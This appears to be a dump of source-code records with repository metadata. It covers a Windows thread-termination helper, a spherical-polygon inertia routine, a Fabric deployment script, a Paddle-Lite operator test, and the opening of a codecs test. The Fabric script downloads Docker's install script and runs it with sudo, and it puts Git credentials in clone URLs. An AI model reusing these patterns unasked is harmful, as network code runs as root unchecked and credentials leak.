DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwThreadId
);
"""
TerminateThread = windll.kernel32.TerminateThread
TerminateThread.restype = wintypes.BOOL
TerminateThread.argtypes = (wintypes.HANDLE, wintypes.DWORD)
TerminateThread.errcheck = assertTrue
TerminateThread.__doc__ = """\
BOOL WINAPI TerminateThread(
_Inout_ HANDLE hThread,
_In_ DWORD dwExitCode
);
"""
CloseHandle = windll.kernel32.CloseHandle
CloseHandle.restype = wintypes.BOOL
CloseHandle.argtypes = (wintypes.HANDLE, )
CloseHandle.errcheck = assertTrue
CloseHandle.__doc__ = """\
BOOL WINAPI CloseHandle(
_In_ HANDLE hObject
);
"""
THREAD_TERMINATE = 0x0001
@contextmanager
def closing(handle):
yield handle
CloseHandle(handle)
class ThreadTerminationWarning(RuntimeWarning):
pass
class TerminatableThread(Thread):
__termination_lock = Lock()
def terminate(self, exit_code=1):
with self.__termination_lock:
warnings.warn(
"Be aware that thread (ident=%s, name=%s) is being terminated "
"by non-standard way, it would cause various problems such as "
"generating uncollectable objects bounded to the thread and "
"so on." % (self.ident, self.name),
category=ThreadTerminationWarning, stacklevel=2)
with closing(OpenThread(THREAD_TERMINATE, False, self.ident)) as h:
TerminateThread(h, exit_code)
with _active_limbo_lock:
del _active[self.ident]
if hasattr(self, "_is_stopped"):
self._is_stopped = True
self._tstate_lock.release()
elif hasattr(self, "_stop"):
self._stop()
elif hasattr(self, "_Thread__stop"):
self._Thread__stop()
| true | true |
f7fa2f2fef8dbc0635ae065be6232efbdbf90d67 | 3,152 | py | Python | sphericalpolygon/inertia.py | lcx366/SphericalPolygon | 5594f54bcc2aef2c0ff2aca26a710f76548f050e | [
"MIT"
] | 2 | 2020-01-10T14:21:53.000Z | 2022-01-11T10:29:24.000Z | sphericalpolygon/inertia.py | lcx366/SphericalPolygon | 5594f54bcc2aef2c0ff2aca26a710f76548f050e | [
"MIT"
] | null | null | null | sphericalpolygon/inertia.py | lcx366/SphericalPolygon | 5594f54bcc2aef2c0ff2aca26a710f76548f050e | [
"MIT"
] | 1 | 2021-11-15T13:10:57.000Z | 2021-11-15T13:10:57.000Z | import numpy as np
from scipy.integrate import dblquad
from .excess_area import polygon_excess
from .functions import *
def polygon_inertia(vertices):
'''
Calculate the geometrical inertia tensor of a spherical polygon over a unit sphere.
Usage:
inertia = polygon_inertia(vertices)
Inputs:
vertices -> [float 2d array] Vertices of the spherical polygon in form of [[lat_0,lon_0],..,[lat_n,lon_n]] with unit of degrees.
Vertices can be arranged either counterclockwise or clockwise.
Outputs:
inertia -> [float array with 6 elements] geometrical inertia tensor; it is symmetrical and has six independent components.
Note: The spherical polygon has a latitude range of [-90°,90°] and a longitude range of [-180°,180°] or [0°,360°].
'''
N = len(vertices)
# Initialize the 6 components of the geometrical inertia tensor
sum11,sum22,sum33,sum12,sum13,sum23 = np.zeros(6)
for i in range(N - 1):
p1 = np.radians(vertices[i])
p2 = np.radians(vertices[i+1])
pdlon = p2[1]-p1[1]
if pdlon < -np.pi: p2[1] = p2[1] + 2*np.pi
if pdlon > np.pi: p2[1] = p2[1] - 2*np.pi
# If two adjacent vertices are close enough(coincident), do nothing.
if np.abs(pdlon) < 1e-6: continue
c1,c2,c3= integrate_coeffs(p1,p2)
# Calculate the geometrical inertia tensor
s11 = dblquad(f11, p1[1], p2[1], fs_low,fs_up)
s22 = dblquad(f22, p1[1], p2[1], fs_low,fs_up)
s33 = dblquad(f33, p1[1], p2[1], fs_low,fs_up)
s12 = dblquad(f12, p1[1], p2[1], fs_low,fs_up)
s13 = dblquad(f13, p1[1], p2[1], fs_low,fs_up)
s23 = dblquad(f23, p1[1], p2[1], fs_low,fs_up)
sum11 += s11[0]
sum22 += s22[0]
sum33 += s33[0]
sum12 += s12[0]
sum13 += s13[0]
sum23 += s23[0]
excess = polygon_excess(vertices)
# For counterclockwise arrangement
if excess > 0 and excess < 2*np.pi:
inertia11 = excess - sum11
inertia22 = excess - sum22
inertia33 = excess - sum33
inertia12 = -sum12
inertia13 = -sum13
inertia23 = -sum23
if excess >= 2*np.pi:
inertia11 = 8/3*np.pi - (excess - sum11)
inertia22 = 8/3*np.pi - (excess - sum22)
inertia33 = 8/3*np.pi - (excess - sum33)
inertia12 = sum12
inertia13 = sum13
inertia23 = sum23
# For clockwise arrangement
if excess < 0 and excess > -2*np.pi:
inertia11 = -excess + sum11
inertia22 = -excess + sum22
inertia33 = -excess + sum33
inertia12 = sum12
inertia13 = sum13
inertia23 = sum23
if excess <= -2*np.pi:
inertia11 = 8/3*np.pi - (-excess + sum11)
inertia22 = 8/3*np.pi - (-excess + sum22)
inertia33 = 8/3*np.pi - (-excess + sum33)
inertia12 = -sum12
inertia13 = -sum13
inertia23 = -sum23
return np.array([inertia11,inertia22,inertia33,inertia12,inertia13,inertia23]) | 33.178947 | 132 | 0.576777 | import numpy as np
from scipy.integrate import dblquad
from .excess_area import polygon_excess
from .functions import *
def polygon_inertia(vertices):
N = len(vertices)
sum11,sum22,sum33,sum12,sum13,sum23 = np.zeros(6)
for i in range(N - 1):
p1 = np.radians(vertices[i])
p2 = np.radians(vertices[i+1])
pdlon = p2[1]-p1[1]
if pdlon < -np.pi: p2[1] = p2[1] + 2*np.pi
if pdlon > np.pi: p2[1] = p2[1] - 2*np.pi
if np.abs(pdlon) < 1e-6: continue
c1,c2,c3= integrate_coeffs(p1,p2)
s11 = dblquad(f11, p1[1], p2[1], fs_low,fs_up)
s22 = dblquad(f22, p1[1], p2[1], fs_low,fs_up)
s33 = dblquad(f33, p1[1], p2[1], fs_low,fs_up)
s12 = dblquad(f12, p1[1], p2[1], fs_low,fs_up)
s13 = dblquad(f13, p1[1], p2[1], fs_low,fs_up)
s23 = dblquad(f23, p1[1], p2[1], fs_low,fs_up)
sum11 += s11[0]
sum22 += s22[0]
sum33 += s33[0]
sum12 += s12[0]
sum13 += s13[0]
sum23 += s23[0]
excess = polygon_excess(vertices)
if excess > 0 and excess < 2*np.pi:
inertia11 = excess - sum11
inertia22 = excess - sum22
inertia33 = excess - sum33
inertia12 = -sum12
inertia13 = -sum13
inertia23 = -sum23
if excess >= 2*np.pi:
inertia11 = 8/3*np.pi - (excess - sum11)
inertia22 = 8/3*np.pi - (excess - sum22)
inertia33 = 8/3*np.pi - (excess - sum33)
inertia12 = sum12
inertia13 = sum13
inertia23 = sum23
if excess < 0 and excess > -2*np.pi:
inertia11 = -excess + sum11
inertia22 = -excess + sum22
inertia33 = -excess + sum33
inertia12 = sum12
inertia13 = sum13
inertia23 = sum23
if excess <= -2*np.pi:
inertia11 = 8/3*np.pi - (-excess + sum11)
inertia22 = 8/3*np.pi - (-excess + sum22)
inertia33 = 8/3*np.pi - (-excess + sum33)
inertia12 = -sum12
inertia13 = -sum13
inertia23 = -sum23
return np.array([inertia11,inertia22,inertia33,inertia12,inertia13,inertia23]) | true | true |
f7fa2fe16e5e15e747920ac84b9b7e96c7c7b8a2 | 8,096 | py | Python | fabfile.py | janbrrr/django-polls-improved | 14ffea3a0477e94e6154a9eab08c380ff7415819 | [
"MIT"
] | null | null | null | fabfile.py | janbrrr/django-polls-improved | 14ffea3a0477e94e6154a9eab08c380ff7415819 | [
"MIT"
] | null | null | null | fabfile.py | janbrrr/django-polls-improved | 14ffea3a0477e94e6154a9eab08c380ff7415819 | [
"MIT"
] | null | null | null | from getpass import getpass
from fabric import Config, Connection, task
from invoke import Responder
from invoke import run as run_local
REPOSITORY_URL = "github.com/janbrrr/django-polls-improved.git" # without the https://
HOSTS = {
"local": {"address": "localhost"},
"prod": {"address": "YOUR-HOST", "project_dir": "~/python/django-polls-improved"},
}
DOCKER_RUN_CMD = "docker-compose up -d --build"
DOCKER_STOP_CMD = "docker-compose down"
DOCKER_STATUS_CMD = "docker-compose ps"
DOCKER_LOGS_CMD = "docker-compose logs"
@task
def setup(context):
host = context.host
if host not in HOSTS or host == "local":
raise RuntimeError("Run 'fab -H <host> setup' where <host> is 'prod'")
remote_user = input("User: ")
remote_password = getpass("Password: ")
config = Config(overrides={"sudo": {"password": remote_password}})
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}, config=config
) as connection:
git_clone(connection, remote_project_dir)
install_python(connection, remote_password)
install_docker(connection)
# Install docker-compose in a virtual environment
create_venv(connection, remote_project_dir)
run_in_venv(connection, remote_project_dir, "pip install wheel") # Required for building
run_in_venv(connection, remote_project_dir, "pip install docker-compose")
print()
print("Setup complete!")
print("Remember to put your certificate in 'nginx/my_cert.pem' and your key in 'nginx/my_key.pem'")
print("or run 'fab -H prod create-certificate' to create a self-signed certificate")
print("Remember to create the '.env' and 'env.db' files to configure the Django and Postgres.")
@task
def create_certificate(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> create-certificate' where <host> is 'local' or 'prod'")
command = "openssl req -x509 -newkey rsa:4096 -keyout nginx/my_key.pem -out nginx/my_cert.pem -days 365 --nodes"
if host == "local":
run_local(command)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
with connection.cd(remote_project_dir):
connection.run(command)
@task
def create_superuser(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> create-superuser' where <host> is 'local' or 'prod'")
command = "docker-compose exec web python manage.py createsuperuser"
if host == "local":
run_local(command)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, command, pty=True)
@task
def deploy(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> deploy' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_RUN_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
git_pull(connection, remote_project_dir)
run_in_venv(connection, remote_project_dir, DOCKER_RUN_CMD)
@task
def stop(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> stop' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_STOP_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_STOP_CMD)
@task
def status(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> status' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_STATUS_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_STATUS_CMD)
@task
def logs(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> logs' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_LOGS_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_LOGS_CMD)
def install_docker(connection):
connection.run("curl -fsSL https://get.docker.com -o get-docker.sh")
connection.sudo("sh get-docker.sh")
connection.sudo("usermod -a -G docker $USER")
def install_python(connection, sudo_password):
connection.sudo("apt-get update -qy")
connection.sudo(
"apt-get install -qy build-essential tk-dev libncurses5-dev libncursesw5-dev libreadline6-dev libdb5.3-dev "
"libgdbm-dev libsqlite3-dev libssl-dev libbz2-dev libexpat1-dev liblzma-dev zlib1g-dev libffi-dev"
)
connection.run("wget https://www.python.org/ftp/python/3.7.3/Python-3.7.3.tar.xz")
connection.run("tar xf Python-3.7.3.tar.xz")
with connection.cd("Python-3.7.3"):
connection.run("./configure")
connection.run("make")
# Running connection.sudo(...) will fail for the next command, so we need a workaround
# Make sure to adjust the pattern if you are using a different language
sudo_responder = Responder(pattern=r"\[sudo\] password", response=f"{sudo_password}\n")
connection.run("sudo make altinstall", pty=True, watchers=[sudo_responder])
connection.sudo("rm -r Python-3.7.3")
connection.sudo("rm Python-3.7.3.tar.xz")
def git_clone(connection, project_dir):
git_username = input("Git username: ")
git_password = getpass("Git password: ")
connection.run(f"git clone https://{git_username}:{git_password}@{REPOSITORY_URL} {project_dir}")
def git_pull(connection, project_dir):
with connection.cd(project_dir):
git_username = input("Git username: ")
git_password = getpass("Git password: ")
connection.run(f"git pull https://{git_username}:{git_password}@{REPOSITORY_URL} master")
def create_venv(connection, project_dir):
with connection.cd(project_dir):
connection.run("python3.7 -m venv venv")
def run_in_venv(connection, project_dir, command, **kwargs):
with connection.cd(project_dir):
connection.run(f"source venv/bin/activate && {command}", **kwargs)
| 39.492683 | 116 | 0.669837 | from getpass import getpass
from fabric import Config, Connection, task
from invoke import Responder
from invoke import run as run_local
REPOSITORY_URL = "github.com/janbrrr/django-polls-improved.git"
HOSTS = {
"local": {"address": "localhost"},
"prod": {"address": "YOUR-HOST", "project_dir": "~/python/django-polls-improved"},
}
DOCKER_RUN_CMD = "docker-compose up -d --build"
DOCKER_STOP_CMD = "docker-compose down"
DOCKER_STATUS_CMD = "docker-compose ps"
DOCKER_LOGS_CMD = "docker-compose logs"
@task
def setup(context):
host = context.host
if host not in HOSTS or host == "local":
raise RuntimeError("Run 'fab -H <host> setup' where <host> is 'prod'")
remote_user = input("User: ")
remote_password = getpass("Password: ")
config = Config(overrides={"sudo": {"password": remote_password}})
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}, config=config
) as connection:
git_clone(connection, remote_project_dir)
install_python(connection, remote_password)
install_docker(connection)
create_venv(connection, remote_project_dir)
run_in_venv(connection, remote_project_dir, "pip install wheel")
run_in_venv(connection, remote_project_dir, "pip install docker-compose")
print()
print("Setup complete!")
print("Remember to put your certificate in 'nginx/my_cert.pem' and your key in 'nginx/my_key.pem'")
print("or run 'fab -H prod create-certificate' to create a self-signed certificate")
print("Remember to create the '.env' and 'env.db' files to configure the Django and Postgres.")
@task
def create_certificate(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> create-certificate' where <host> is 'local' or 'prod'")
command = "openssl req -x509 -newkey rsa:4096 -keyout nginx/my_key.pem -out nginx/my_cert.pem -days 365 --nodes"
if host == "local":
run_local(command)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
with connection.cd(remote_project_dir):
connection.run(command)
@task
def create_superuser(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> create-superuser' where <host> is 'local' or 'prod'")
command = "docker-compose exec web python manage.py createsuperuser"
if host == "local":
run_local(command)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, command, pty=True)
@task
def deploy(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> deploy' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_RUN_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
git_pull(connection, remote_project_dir)
run_in_venv(connection, remote_project_dir, DOCKER_RUN_CMD)
@task
def stop(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> stop' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_STOP_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_STOP_CMD)
@task
def status(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> status' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_STATUS_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_STATUS_CMD)
@task
def logs(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> logs' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_LOGS_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_LOGS_CMD)
def install_docker(connection):
connection.run("curl -fsSL https://get.docker.com -o get-docker.sh")
connection.sudo("sh get-docker.sh")
connection.sudo("usermod -a -G docker $USER")
def install_python(connection, sudo_password):
connection.sudo("apt-get update -qy")
connection.sudo(
"apt-get install -qy build-essential tk-dev libncurses5-dev libncursesw5-dev libreadline6-dev libdb5.3-dev "
"libgdbm-dev libsqlite3-dev libssl-dev libbz2-dev libexpat1-dev liblzma-dev zlib1g-dev libffi-dev"
)
connection.run("wget https://www.python.org/ftp/python/3.7.3/Python-3.7.3.tar.xz")
connection.run("tar xf Python-3.7.3.tar.xz")
with connection.cd("Python-3.7.3"):
connection.run("./configure")
connection.run("make")
sudo_responder = Responder(pattern=r"\[sudo\] password", response=f"{sudo_password}\n")
connection.run("sudo make altinstall", pty=True, watchers=[sudo_responder])
connection.sudo("rm -r Python-3.7.3")
connection.sudo("rm Python-3.7.3.tar.xz")
def git_clone(connection, project_dir):
git_username = input("Git username: ")
git_password = getpass("Git password: ")
connection.run(f"git clone https://{git_username}:{git_password}@{REPOSITORY_URL} {project_dir}")
def git_pull(connection, project_dir):
with connection.cd(project_dir):
git_username = input("Git username: ")
git_password = getpass("Git password: ")
connection.run(f"git pull https://{git_username}:{git_password}@{REPOSITORY_URL} master")
def create_venv(connection, project_dir):
with connection.cd(project_dir):
connection.run("python3.7 -m venv venv")
def run_in_venv(connection, project_dir, command, **kwargs):
with connection.cd(project_dir):
connection.run(f"source venv/bin/activate && {command}", **kwargs)
| true | true |
f7fa30565c238f3f862a6dc7fda40b74bae15450 | 4,936 | py | Python | lite/tests/unittest_py/op/test_generate_proposals_op.py | liyupeng/Paddle-Lite | e821d4d6f62f71534f594afc74560738bf02a879 | [
"Apache-2.0"
] | null | null | null | lite/tests/unittest_py/op/test_generate_proposals_op.py | liyupeng/Paddle-Lite | e821d4d6f62f71534f594afc74560738bf02a879 | [
"Apache-2.0"
] | null | null | null | lite/tests/unittest_py/op/test_generate_proposals_op.py | liyupeng/Paddle-Lite | e821d4d6f62f71534f594afc74560738bf02a879 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../')
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
import numpy as np
from functools import partial
import hypothesis.strategies as st
class TestGenerateProposalsOp(AutoScanTest):
def __init__(self, *args, **kwargs):
AutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(TargetType.Host, PrecisionType.FP32, DataLayoutType.NCHW, thread=[1, 4])
def is_program_valid(self, program_config: ProgramConfig , predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
in_shape = draw(st.lists(st.integers(min_value=16, max_value=32), min_size=4, max_size=4))
in_shape[0] = 1
anchor_sizes = draw(st.sampled_from([[32.0], [32.0, 64.0], [64.0, 128.0], [32.0, 64.0, 128.0]]))
aspect_ratios = draw(st.sampled_from([[1.0], [1.0, 2.0], [0.5, 1.0, 2.0]]))
variances = draw(st.lists(st.floats(min_value=0.5, max_value=1.5), min_size=4, max_size=4))
stride = draw(st.sampled_from([[16.0, 16.0], [24.0, 24.0], [16.0, 24.0]]))
num_anchors = len(anchor_sizes) * len(aspect_ratios)
anchor_generator_op = OpConfig(
type = "anchor_generator",
inputs = {"Input" : ["input_data"]},
outputs = {"Anchors": ["anchors_data"],
"Variances": ["variance_data"]},
attrs = {"anchor_sizes": anchor_sizes,
"aspect_ratios": aspect_ratios,
"stride": stride,
"variances": variances,
"offset": 0.5
})
scale = draw(st.floats(min_value=1, max_value=1))
scores_shape = [in_shape[0], num_anchors, in_shape[2], in_shape[3]]
bbox_delta_shape = [scores_shape[0], scores_shape[1] * 4, scores_shape[2], scores_shape[3]]
pre_nms_topN = draw(st.integers(min_value=2000, max_value=8000))
post_nms_topN = draw(st.integers(min_value=1000, max_value=1500))
nms_thresh = draw(st.floats(min_value=0.5, max_value=0.8))
min_size = draw(st.floats(min_value=2, max_value=4))
eta = draw(st.floats(min_value=0.5, max_value=1.5))
def generate_im_info(*args, **kwargs):
return np.array([in_shape[2] * stride[0], in_shape[3] * stride[1], scale]).astype(np.float32)
generate_proposals_op = OpConfig(
type = "generate_proposals",
inputs = {
"Scores" : ["scores_data"],
"BboxDeltas" : ["bbox_delta_data"],
"ImInfo" : ["im_info_data"],
"Anchors" : ["anchors_data"],
"Variances" : ["variance_data"]
},
outputs = {
"RpnRois": ["rpn_rois_data"],
"RpnRoiProbs" : ["rpn_rois_probs_data"],
"RpnRoisNum" : ["rpn_rois_num_data"]
},
attrs = {
"pre_nms_topN" : pre_nms_topN,
"post_nms_topN" : post_nms_topN,
"nms_thresh" : nms_thresh,
"min_size" : min_size,
"eta" : eta
})
program_config = ProgramConfig(
ops=[anchor_generator_op, generate_proposals_op],
weights={},
inputs={
"input_data":
TensorConfig(shape=in_shape),
"scores_data":
TensorConfig(shape=scores_shape),
"bbox_delta_data":
TensorConfig(shape=bbox_delta_shape),
"im_info_data":
TensorConfig(data_gen=partial(generate_im_info))
},
outputs=["rpn_rois_data", "rpn_rois_probs_data", "rpn_rois_num_data"])
return program_config
def sample_predictor_configs(self):
return self.get_predictor_configs(), ["anchor_generator"], (1e-5, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main(argv=[''])
| 41.133333 | 125 | 0.60859 |
import sys
sys.path.append('../')
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
import numpy as np
from functools import partial
import hypothesis.strategies as st
class TestGenerateProposalsOp(AutoScanTest):
def __init__(self, *args, **kwargs):
AutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(TargetType.Host, PrecisionType.FP32, DataLayoutType.NCHW, thread=[1, 4])
def is_program_valid(self, program_config: ProgramConfig , predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
in_shape = draw(st.lists(st.integers(min_value=16, max_value=32), min_size=4, max_size=4))
in_shape[0] = 1
anchor_sizes = draw(st.sampled_from([[32.0], [32.0, 64.0], [64.0, 128.0], [32.0, 64.0, 128.0]]))
aspect_ratios = draw(st.sampled_from([[1.0], [1.0, 2.0], [0.5, 1.0, 2.0]]))
variances = draw(st.lists(st.floats(min_value=0.5, max_value=1.5), min_size=4, max_size=4))
stride = draw(st.sampled_from([[16.0, 16.0], [24.0, 24.0], [16.0, 24.0]]))
num_anchors = len(anchor_sizes) * len(aspect_ratios)
anchor_generator_op = OpConfig(
type = "anchor_generator",
inputs = {"Input" : ["input_data"]},
outputs = {"Anchors": ["anchors_data"],
"Variances": ["variance_data"]},
attrs = {"anchor_sizes": anchor_sizes,
"aspect_ratios": aspect_ratios,
"stride": stride,
"variances": variances,
"offset": 0.5
})
scale = draw(st.floats(min_value=1, max_value=1))
scores_shape = [in_shape[0], num_anchors, in_shape[2], in_shape[3]]
bbox_delta_shape = [scores_shape[0], scores_shape[1] * 4, scores_shape[2], scores_shape[3]]
pre_nms_topN = draw(st.integers(min_value=2000, max_value=8000))
post_nms_topN = draw(st.integers(min_value=1000, max_value=1500))
nms_thresh = draw(st.floats(min_value=0.5, max_value=0.8))
min_size = draw(st.floats(min_value=2, max_value=4))
eta = draw(st.floats(min_value=0.5, max_value=1.5))
def generate_im_info(*args, **kwargs):
return np.array([in_shape[2] * stride[0], in_shape[3] * stride[1], scale]).astype(np.float32)
generate_proposals_op = OpConfig(
type = "generate_proposals",
inputs = {
"Scores" : ["scores_data"],
"BboxDeltas" : ["bbox_delta_data"],
"ImInfo" : ["im_info_data"],
"Anchors" : ["anchors_data"],
"Variances" : ["variance_data"]
},
outputs = {
"RpnRois": ["rpn_rois_data"],
"RpnRoiProbs" : ["rpn_rois_probs_data"],
"RpnRoisNum" : ["rpn_rois_num_data"]
},
attrs = {
"pre_nms_topN" : pre_nms_topN,
"post_nms_topN" : post_nms_topN,
"nms_thresh" : nms_thresh,
"min_size" : min_size,
"eta" : eta
})
program_config = ProgramConfig(
ops=[anchor_generator_op, generate_proposals_op],
weights={},
inputs={
"input_data":
TensorConfig(shape=in_shape),
"scores_data":
TensorConfig(shape=scores_shape),
"bbox_delta_data":
TensorConfig(shape=bbox_delta_shape),
"im_info_data":
TensorConfig(data_gen=partial(generate_im_info))
},
outputs=["rpn_rois_data", "rpn_rois_probs_data", "rpn_rois_num_data"])
return program_config
def sample_predictor_configs(self):
return self.get_predictor_configs(), ["anchor_generator"], (1e-5, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main(argv=[''])
| true | true |
f7fa305b79b7894b34e4865ca9355c4a05bbc097 | 113,086 | py | Python | Lib/yp_test/test_codecs.py | Syeberman/nohtyP | 59d7214a5a5474a03c54f45d79ad4fd037989a79 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/yp_test/test_codecs.py | Syeberman/nohtyP | 59d7214a5a5474a03c54f45d79ad4fd037989a79 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/yp_test/test_codecs.py | Syeberman/nohtyP | 59d7214a5a5474a03c54f45d79ad4fd037989a79 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | from yp import *
import codecs
import contextlib
import io
import locale
import sys
from yp_test import yp_unittest
import warnings
import encodings
from yp_test import support
# Extra assurance that we're not accidentally testing Python's types...unless we mean to
_str = str
def bytes( *args, **kwargs ): raise NotImplementedError( "convert script to yp_bytes here" )
def bytearray( *args, **kwargs ): raise NotImplementedError( "convert script to yp_bytearray here" )
def str( *args, **kwargs ): raise NotImplementedError( "convert script to yp_str here" )
if sys.platform == 'win32':
VISTA_OR_LATER = (sys.getwindowsversion().major >= 6)
else:
VISTA_OR_LATER = False
try:
import ctypes
except ImportError:
ctypes = None
SIZEOF_WCHAR_T = -1
else:
SIZEOF_WCHAR_T = ctypes.sizeof(ctypes.c_wchar)
def coding_checker(self, coder):
def check(input, expect):
self.assertEqual(coder(input), (expect, len(input)))
return check
class Queue(object):
"""
queue: write bytes at one end, read bytes from the other end
"""
def __init__(self, buffer):
self._buffer = buffer
def write(self, chars):
self._buffer += chars
def read(self, size=-1):
if size<0:
s = self._buffer
self._buffer = self._buffer[:0] # make empty
return s
else:
s = self._buffer[:size]
self._buffer = self._buffer[size:]
return s
class MixInCheckStateHandling:
def check_state_handling_decode(self, encoding, u, s):
for i in range(len(s)+1):
d = codecs.getincrementaldecoder(encoding)()
part1 = d.decode(s[:i])
state = d.getstate()
self.assertIsInstance(state[1], int)
# Check that the condition stated in the documentation for
# IncrementalDecoder.getstate() holds
if not state[1]:
# reset decoder to the default state without anything buffered
d.setstate((state[0][:0], 0))
# Feeding the previous input may not produce any output
self.assertTrue(not d.decode(state[0]))
# The decoder must return to the same state
self.assertEqual(state, d.getstate())
# Create a new decoder and set it to the state
# we extracted from the old one
d = codecs.getincrementaldecoder(encoding)()
d.setstate(state)
part2 = d.decode(s[i:], True)
self.assertEqual(u, part1+part2)
def check_state_handling_encode(self, encoding, u, s):
for i in range(len(u)+1):
d = codecs.getincrementalencoder(encoding)()
part1 = d.encode(u[:i])
state = d.getstate()
